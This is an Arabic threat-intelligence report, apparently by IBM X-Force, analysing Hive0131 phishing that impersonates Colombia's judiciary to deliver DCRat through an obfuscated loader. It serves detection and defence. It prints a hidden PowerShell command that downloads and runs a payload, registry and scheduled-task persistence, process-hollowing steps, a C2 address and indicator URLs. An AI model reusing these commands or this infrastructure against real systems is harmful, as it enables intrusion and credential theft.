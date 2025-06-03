العلامات
في أوائل مايو 2025، رصد فريق IBM X-Force قيام الجهة Hive0131 بتنفيذ حملات بريد إلكتروني استهدفت مستخدمين في كولومبيا، تضمنت إشعارات إلكترونية بإجراءات جنائية زُعم بأنها صادرة عن السلطة القضائية في كولومبيا. تُعد Hive0131 مجموعة ذات دوافع مالية يُرجَّح أنها تنحدر من أمريكا الجنوبية، وتنفِّذ بشكل منتظم حملات في أمريكا اللاتينية (LATAM) لتوصيل مجموعة واسعة من الحمولات البرمجية الشائعة. تقلِّد الحملات الحالية المراسلات الرسمية وتحتوي على رابط مضمَّن أو ملف PDF جذاب يحتوي على رابط مضمَّن. يؤدي النقر على الرابط المضمَّن إلى بدء سلسلة الإصابة لتنفيذ حصان طروادة المصرفي DCRat في الذاكرة. 

يتم تشغيل DCRat وفق نموذج البرمجيات الضارة كخدمة (MaaS)، وقد ظهر لأول مرة على الأقل منذ عام 2018، مع ترويجه على نطاق واسع في منتديات الجرائم الإلكترونية الروسية، حيث يمكن شراؤه بحوالي 7 دولارات أمريكية لاشتراك لمدة شهرين. ينتشر وجود DCRat على نطاق واسع وقد أصبح شائعًا بشكل متزايد في أمريكا اللاتينية والكاريبي منذ عام 2024 على الأقل. خلال صيف 2024، لاحظت X-Force عدة حملات تستهدف كيانات في كولومبيا، جميعها تقلِّد شركة لاتينية متخصصة في النظم البنائية الإلكترونية في المكسيك وكولومبيا. ومع ذلك، وبالنظر إلى الاختلافات في سلسلة الإصابة وآلية توصيل DCRat، تقيِّم X-Force أن حملات عام 2024 والحملات الحالية تم تنفيذها من قِبل جهات فاعلة مختلفة. اعتمدت الحملات التي تم رصدها في عام 2024 بشكل كبير على ملفات RAR محمية بكلمات مرور تحتوي على NSIS لتنفيذ أداة التنزيل GuLoader، في حين تعتمد هذه الحملات الأخيرة على مُحمِّل ‎.NET مُموَّه أطلقنا عليه اسم VMDetectLoader. 

قدرات DCRat

  • تجاوز AMSI
  • الكشف عن بيئات التحليل
  • إنهاء العمليات المدرجة في قائمة الحظر
  • تحقيق الاستمرارية من خلال مهمة مجدولة أو مفتاح في السجل
  • الاستماع للأوامر من خادم قيادة وتحكم (C2)

يأتي DCRat مزوّدًا بعناصر إضافية قادرة على تنفيذ المهام التالية، مع إمكانية قيام الجهات المهدِّدة بإنشاء عناصر إضافية مخصّصة لتنفيذ مهام إضافية.

  • تسجيل الضحية من خلال ميكرفون أو كاميرا الكمبيوتر
  • تحميل وتنزيل الملفات
  • تنفيذ الأوامر
  • الحصول على معلومات النظام
  • تشفير الملفات وفك تشفيرها
  • تحرير مفاتيح السجل
  • تسجيل ضغطات المفاتيح وبيانات الحافظة
  • معالجة نظام الملفات

نوع التهديد

MaaS

التحليل

في أوائل مايو 2025، راقب X-Force حملات البريد الإلكتروني Hive0131 التي تقلِّد هيئة القضاء الكولومبية (Rama Judicial de Colombia)، التي تدعي أنها من الدائرة المدنية في بوغوتا، كولومبيا، لإرسال إشعارات إلكترونية عن الإجراءات الجنائية. تتضمن الحملات التي تم رصدها إما ملف PDF خداعيًّا يحتوي على رابط يقود إلى TinyURL، وإمَّا رابطًا مضمّنًا يؤدي إلى موقع على Google Docs. 

نظرة عامة على سلسلة الإصابة - ملف PDF مع رابط TinyURL

بالنسبة لرسائل البريد الإلكتروني التي تحتوي على ملف PDF يؤدي إلى عنوان URL صغير، تتم إعادة توجيه الضحية إلى أرشيف ZIP باسم 1Juzgado 08 Civil Circuito de Bogotá Notificacion Electronica Orden de Embargo.Uue. يحتوي أرشيف ZIP على ملفات حميدة بالإضافة إلى ملف JavaScript ضار يُسمى 1Juzgado 08 Civil Circuito de Bogotá Notificacion Electronica Orden de Embargo.js. يقوم ملف جافا سكريبت بتنزيل حمولة جافا سكريبت من موقع paste[.]ee ثم يقوم بتنفيذها. ثم تقوم هذه الحمولة بتنفيذ أمر PowerShell الذي يقوم بتنزيل صورة JPG من hxxps://archive[.]org/download/new_ABBAS/new_ABBAS.jpg مع إضافة برنامج تحميل مشفر بصيغة base64 إلى نهاية الملف. بمجرد التنفيذ ، يقوم المحمِّل بتنزيل وتنفيذ DCRat في الذاكرة.

يطلق على المحمِّل اسم VMDetectLoader بسبب قدرته على تحديد ما إذا كان يعمل في بيئة تجريبية. يشير التحليل إلى أن المحمِّل يعتمد على المشروع مفتوح المصدر https://github.com/robsonfelix/VMDetector.

سلسلة الإصابة الخاصة بـ RAMA
الشكل 1: سلسلة الإصابة الخاصة بـ RAMA
نموذج بريد إلكتروني مع ملف PDF كعنصر جذب
الشكل 2: نموذج بريد إلكتروني مع ملف PDF كعنصر جذب

نظرة عامة على سلسلة الإصابة - رابط Google Docs مضمَّن

تبدأ سلسلة الإصابة هذه عبر رسائل تصيّد احتيالي تحتوي على رابط لتنزيل ملف من Google Docs، وهو أرشيف ZIP محمي بكلمة مرور باسم CUI 158616000129-2025-10047_122011111777.zip، حيث تكون كلمة المرور مذكورة في رسالة البريد الإلكتروني وهي 3004. يحتوي الأرشيف على برنامج تنزيل ملفات دفعية، CUI 158616000129-2025-10047_122011111777.bat، يقوم بتنزيل وتنفيذ مكون VBScript (VBS) مُشفر منhxxp://paste[.]ee/d/jYHEqBJ3/0  إلى %WinDir%\Temp\Pernambuco.vbs. يقوم برنامج VBS النصي بعد ذلك بفك تشفير وتنفيذ برنامج PowerShell النصي المشفر بصيغة base64 والذي يقوم بتنزيل VMDetectLoader عبر ملف JPG منhxxps://ia601205.us.archive[.]org/26/items/new_image_20250430/new_image[.]jpg
ثم يتم تنزيل الحمولة النهائية بواسطة VMDetectLoader عبر paste[.]ee عنوان URL الذي تم تمريره إليه بواسطة برنامج PowerShell النصي.

سلسلة الإصابة بـ RAMA باستخدام Google Docs
الشكل 3: سلسلة الإصابة بـ RAMA باستخدام Google Docs
نموذج بريد إلكتروني مع رابط Google Docs
الشكل 4: نموذج بريد إلكتروني مع رابط Google Docs

VMDetectLoader

VMDetectLoader هو برنامج تحميل .NET مُشفر (Microsoft.Win32.TaskScheduler.dll) والذي يمكن العثور عليه على VirusTotal على الرابط التالي: https://www.virustotal.com/gui/file/0df13fd42fb4a4374981474ea87895a3830eddcc7f3bd494e76acd604c4004f7. يشير تحليل البيانات الوصفية للمحمِّل إلى أن الكود يعتمد على مشروع مفتوح المصدر https://github.com/robsonfelix/VMDetector.

سمات التجميع:

[assembly: AssemblyVersion("1.1.0.0")]
[assembly: CompilationRelaxations(8)]
[assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default |
DebuggableAttribute.DebuggingModes.DisableOptimizations |
DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints |
DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
[assembly: AssemblyTitle("VMDetector")]
[assembly: AssemblyCompany("Robson Felix")]
[assembly: AssemblyProduct("VMDetector")]
[assembly: AssemblyCopyright("Copyright © Robson Felix 2017")]
[assembly: AssemblyTrademark("")]
[assembly: TargetFramework(".NETFramework,Version=v4.5", FrameworkDisplayName = "")]
[assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]

قبل تحميل الحمولة، يكتشف المحمِّل الأجهزة الافتراضية، ويطبع قائمة بخصائص المضيف على وحدة التحكم إذا تم اكتشاف جهاز افتراضي. على سبيل المثال:

MOTHERBOARD INFO
================
Availability = 3
Caption = Motherboard
ConfigManagerErrorCode =
ConfigManagerUserConfig =
CreationClassName = Win32_MotherBoardDevice
Description = Motherboard
DeviceID = Motherboard
ErrorCleared =
ErrorDescription =
InstallDate =
LastErrorCode =
Name = Motherboard
PNPDeviceID =
PowerManagementCapabilities =
PowerManagementSupported =
PrimaryBusType = PCI
RevisionNumber =
SecondaryBusType = ISA
Status = OK
StatusInfo =
SystemCreationClassName = Win32_ComputerSystem
SystemName = DESKTOP-LettersNumbers

--------------------------------------------------------------
Asserting ?
Detected as virtual machine given key computer information.
Detected as virtual machine given bios information.
Detected as virtual machine given hard disk information.
Detected as virtual machine given PnP devices information.
Detected as virtual machine given Windows services information.

الوظيفة

يتم تنفيذ VMDetectLoader عبر وظيفةdnlib.IO.Home.VAI()  الخاصة به ويتم تمرير بيانات مشابهة لما يلي. قد تختلف هذه المعلومات حسب الحملة.

[dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]]
@($storeman,'','','','MSBuild','','','','','C:\Users\Public\Downloads','rhabdo
'rhabdosteus','js','','','bimetallism','1',''));

الوسيط

الوصف

$storeman

 عنوان URL المعكوس للمدعى الذي يمكن من خلاله تنزيل الحمولة المشفرة بـ Base64. 

MSBuilld

 عملية الحقن المستهدفة

C:\Users\Public\Downloads
rhabdosteus
js

 المسار المستخدم في إنشاء مهمة مجدولة: 

C:\Users\Public\Downloads\rhabdosteus.js

1

 علامة تُشير إلى عمليات التحقق من العمليات

bimetallism

 اسم المهمة المجدولة

أثناء التنفيذ، يقوم VMDetectLoader، يقوم XOR بفك تشفير السلاسل البارزة حسب الحاجة من مورد .NET "hIXS".

عينة من السلاسل التي تم فك تشفيرها داخل المجلدات

عينة من السلاسل التي تم فك تشفيرها

vmware
Microsoft Virtual PC
{{ A = {0}, B = {1} }}
--------------------------------------------------------------
Microsoft Hyper-V
qemu
vbox
VirtualBox
BiosCharacteristics
{{ A = {0}, B = {1}, C = {2} }}
SYSTEM\CurrentControlSet\Services\
Caption
{{ A = {0}, B = {1}, C = {2}, D = {3}, E = {4}, F = {5}, G = {6}, H = {7}, I =
{8} }}
Win32_ComputerSystem
OEMStringArray
Win32_BIOS
Win32_MotherboardDevice
Win32_PnPEntity
Win32_DiskDrive
MOTHERBOARD INFO
================
BIOS INFO
=========
COMPUTER INFO
=============
DEVICES INFO
============
HARD DRIVES INFO
WINDOWS SERVICES
virtual
ImagePath
name
.exe
Name
Manufacturer
Model
Description
Detected as virtual machine given PnP devices information.
Detected as virtual machine given processes information.
Detected as virtual machine given Windows services information.

الاستمرارية

في حالة تكوينها للقيام بذلك، يتم إنشاء مهمة مجدولة لتنفيذ أمر PowerShell التالي الذي يقوم بتنزيل حمولة JavaScript وتنفيذها:

-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-
WebRequest -Uri '' -OutFile 'C:\Users\Public\Downloads\rhabdosteus.js'; Start-
Process 'C:\Users\Public\Downloads\rhabdosteus.js'"

يمكن إنشاء مهمة أخرى، في حالة تكوينها، لتنفيذ حمولة JavaScript باستخدام الأمر التالي:

wscript.exe C:\Users\Public\Downloads\rhabdosteus.js

قد يقوم المحمِّل أيضًا بإنشاء مفتاح تشغيل التسجيل لتنفيذ الحمولة:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run = <payload>.js

حقن العملية

يتمتع برنامج VMDetectLoader بالقدرة على استخدام تقنية حقن تجويف العملية لتحميل حمولة في مثيلات العمليات المستهدفة المختلفة. على سبيل المثال، بالنسبة للحملة التي تم تحليلها، فإن C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (32-bit) أو C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe (64-bit) هي العملية المستهدفة. الدالة المسؤولة عن حقن العمليات تُعرَف باسم HackForums.gigajew.x64.Load() للعينات ذات 64 بت وdnlib.IO.Tools.Ande() للعينات ذات 32 بت.

عملية حقن التجويف:

  1. إنشاء عملية معلّقة باستخدام CreateProcess() مع تعيين dwCreationFlags إلى CREATE_SUSPENDED (4).
  2. إلغاء تعيين الذاكرة في العملية المستهدفة باستخدام ZwUnmapViewOfSection().
  3. قم بتخصيص ذاكرة جديدة في العملية المستهدفة باستخدام VirtualAllocEx().
  4. كتابة الحمولة إلى الذاكرة المخصصة حديثًا باستخدامriteProcessMemory ().
  5. تحديث نقطة دخول العملية باستخدام GetThreadContext() وSetThreadContext().
  6. تنفيذ esumeThread () لتنفيذ التعليمات البرمجية.

DCRat

إذا حدد VMDetectLoader أنه يعمل في بيئة آمنة، فسيتم تحميل الحمولة النهائية عبر عملية تفريغ العملية. في هذه الحالة، الحمولة النهائية هي DCRat مع بيانات التكوين التالية.

----- File: Client.exe -----
Field         Value
------------  ----------------------------------------------------------------
Parser        acce:DcRat
File Path
Description   DcRat Implant (qwqdanchun)
Architecture  x86
MD5           eeed02e7ebbfe382b3d3af40fffb9ceb
SHA1          f2f9b1205bfcccb738b03531a8bce39478443463
SHA256        1603c606d62e7794da09c51ca7f321bb5550449165b4fe81153020021cbce140
Compile Time  2021-05-05T21:11:39+00:00

---- Encryption Key ----
Tags           Key                                                                                           
Algorithm    Mode
-------------  ----------------------------------------------------------------------------------------------------  -----------  ------
configuration 
0x8cbd5d207b2b4ab52e36e1f749dac6c91bc7993ce3f926bc51f200db2c2cc3ab   
AES          CBC
configuration 
0xc801bfee49bb3da4722a6c6f67d6bd52e4cc5b6e00f6655c80f1d0b7e823341b229b274527da
ca070bf4659624c77d2819 HMAC-SHA256
                 0f2f5c75e985d9a1d59f72086b8811

---- Interval ----
  Value
-------
      1

---- Mutex ----
Value
---------------------
DcRatMutex_qwqdanchun
---- RSA Public Key ----
Tags              Value
----------------  -------------------------------------------------
x509_certificate  Modulus (n):

                      81:cf:a3:d5:04:94:07:91:c3:77:12:18:5b:ae:d3:
                      8b:66:ba:dd:aa:55:39:a2:f4:9a:e0:8b:f1:aa:4b:
                      49:e1:5e:67:69:ed:d1:e2:1d:ab:6b:f8:ef:0a:CB:
                      a9:05:6d:1c:37:39:de:2a:a2:b3:c4:e3:cb:be:56:
                      53:c7:bb:01:8c:59:20:c7:5a:fb:0d:ba:f8:ac:aa:
                      eb:29:bc:ef:9b:2b:03:53:e0:d8:5a:db:a9:56:5f:
                      e1:84:c8:4e:91:69:82:4d:e1:d3:b7:42:e2:f4:07:
                      14:fa:c1:c7:7a:83:6d:99:26:5f:f4:ba:e8:05:1a:
                      74:9b:24:49:b4:49:1b:4d
                  Public Exponent (e):
                      65537 (0x10001)

---- Socket ----
Tags    Address               Port  Network Protocol
------  ------------------  ------  ------------------
c2      feb18.freeddns.org    8848  TCP

---- Version ----
Value
-------
1.0.7
---- Miscellaneous ----
Key                             Value
------------------------------  ----------------------------------------------------------------------------------------------------
BSOD                            False
group                           ::: 30  :::
AntiProcess                     False
Anti                            False
self_installation_flag          False
x509_certificate_serial_number 
1073276135051967865277505007812279690413261813057
server_signature               
b"\x1a\xebHiD\x1d\xa5\x04\xa4\xce\xb4\xd8=9\x08d\xfa\xe2\xdeT\x14T\xdbX\x00\x1
x12<}\x7f\x91E7*r%f\xcei

\xde\x9d\xd9\x93\x08\xce\xc9\x8c\x1c\x98\x9e_O@j\xc0\xcb\x9a\x00)_\x05\x15M\xe
xe2\x9eg\x05a0p-\xac\x

11\xdd\xac\x7fa\x9e\xbc\x96\xc6F\xc6\xd426\x82\x16\x1d\x8c0\x95N\x0c\x19\x10\x
xb24\xa8\x9aRW'\x10E\
                                  xb3\xc3\xb5\x8d\x04-
-\xdb#\xc7\x9fW\x0c\x93\x91\x004\x16vq\xb5U|\xa8r"
server_signature_valid          True

---- Logs ----
[+] File Client.exe identified as DcRat Implant (qwqdanchun).
[+] Starting parser DcRat Implant (qwqdanchun) on sample Client.exe. Expected
results include c2 socket addresses, a version, a mutex, aes-cbc decryption
parameters, an SSL certificate and server signature, an interval, varying
flags, and possibly a filepath and a group.
[-] Cannot update settings field 0400000f.
[+] A dead-drop resolver URL is not set in the configuration.
[+] Completed parsing using DcRat Implant (qwqdanchun) for sample Client.exe.

----- File Tree -----
<Client.exe (eeed02e7ebbfe382b3d3af40fffb9ceb) : DcRat Implant (qwqdanchun)>

الخاتمة

يتعقب X-Force العديد من المجموعات العاملة في مجال التهديدات في أمريكا اللاتينية والتي تقوم بحملات بريد إلكتروني لتقديم خدمات التسويق عبر البريد الإلكتروني بهدف تحقيق مكاسب مالية. ومن بين المجموعات التي تم تتبعها Hive0148 وHive0149، والتي تركِّز على تقديم حصان طروادة المصرفي Grandoriero، وHive0153 التي تقدم برامج Adwind وSambaSpy الخبيثة، وHive0131. على الرغم من أن Hive0131 تركِّز عادة على العمليات المتعلقة بتوصيل البرامج الضارة مثل QuasarRAT وNjRAT، فقد لاحظ X-Force زيادة في الحملات التي تتضمن DCRat. مع استمرار رصد البرامج الضارة المصرفية التي يتم إيصالها إلى المستخدمين في أمريكا اللاتينية، يقدِّر فريق IBM X-Force أن أمريكا اللاتينية ستستمر في مواجهة استهداف من قبل جهات تهديد تسعى إلى نشر برامج التجسس المصرفية عبر حملات التصيد الاحتيالي في محاولات للحصول على بيانات اعتماد المستخدم وغيرها من المعلومات الحساسة.

التوصيات

تُنصح الكيانات في أمريكا اللاتينية بتوخي الحذر عند التعامل مع رسائل البريد الإلكتروني التي تحتوي على مرفقات أو روابط أو التي تحث على تنزيل الملفات. بالإضافة إلى ذلك، تُنصح الكيانات بإجراء ما يلي:

  • توخي الحذر عند التعامل مع رسائل البريد الإلكتروني التي تحتوي على روابط أو مطالبات تنزيل.
  • مراقبة وجود أدلة على مستوى المضيف لحقن العمليات، وإنشاء العمليات غير المصرح بها، وإنشاء المهام المجدولة، وتعديلات السجل.
  • تثبيت وتحديث وتكوين برامج أمن نقطة النهاية.
  • مراقبة قواعد نقاط النهاية
  • البحث عن تجاوز سياسة التنفيذ.

مؤشرات الاختراق

المؤشر

 نوع المؤشر

  السياق

4ce1d456fa8831733ac01c4a2a32044b6581664d3
11b8791bb2efaa2a1d01f17

 SHA256

 ملف الناقل 

6a632d8356f42694adb21c064aa9e8710b65addd
fdf2209d293ded12fe3d46a7

 SHA256

 أرشيف ZIP

1603c606d62e7794da09c51ca7f321bb555044916
5b4fe81153020021cbce140

 SHA256

 DCRat

ceb88c09069b5ddc8ca525b7f2e26c4852465bc0
ed7c665df39c646287a2f17e    

 SHA256

 JS

0df13fd42fb4a4374981474ea87895a3830eddcc7f3
bd494e76acd604c4004f7

 SHA256

 أداة تحميل .NET مشفرة

db21cc64fb7a7ed9075c96600b7e7e7007a0df7cb8
37189c6551010a6f828590

 SHA256

 أرشيف ZIP

3c95678d140825b56e04298ce6238ce22b34611d25
82ac736c909296ca137ed1

 SHA256

 PS Script

7c3fbea63b7cdf013ef26831bb1850c80f4bfad0103328
de106b3d5491372ccf

 SHA256

 PS Script

b16588e0e2c6a0c8ff080ded57abe8159008d040ae
a78b2e801c17ce79f05863

 SHA256

 أداة تنزيل البرامج النصية الدفعية

hxxps://tinyurl[.]com/2ypy4jrz?id=5541213d-0ed8
-4516-82e7-5460d4ebaf3b

 عنوان URL

 رابط PDF مضمَّن

hxxp://paste[.]ee/d/bx699sF9/0

 عنوان URL

 رابط تنزيل الحمولة

hxxps://docs[.]google[.]com/uc?export=download&id=1aJuQtm8YUqZv12E-atslt_GvBWZ
NbWIK

 عنوان URL

 رابط بريد إلكتروني مضمَّن

hxxp://paste[.]ee/d/jYHEqBJ3/0

 عنوان URL

 رابط تنزيل الحمولة

hxxps://archive[.]org/download/new_ABBAS/new_
ABBAS.jpg

 عنوان URL

 عنوان URL لتنزيل JPG

hxxps://ia601205.us.archive[.]org/26/items/new_
image_20250430/new_image.jpg

   عنوان URL

 عنوان URL لتنزيل JPG

تم دمج IBM X-Force Premier Threat Intelligence الآن مع OpenCTI، ما يوفر معلومات استخباراتية قابلة للتنفيذ حول أنشطة التهديدات هذه وغيرها. احصل على رؤى حول الجهات الفاعلة في التهديدات والبرامج الضارة ومخاطر القطاع. ثبّت OpenCTI Connector لتحسين الكشف والاستجابة، وتعزيز أمنك الإلكتروني بخبرة IBM X-Force. ابقَ في الصدارة - بادِر بالدمج اليوم.

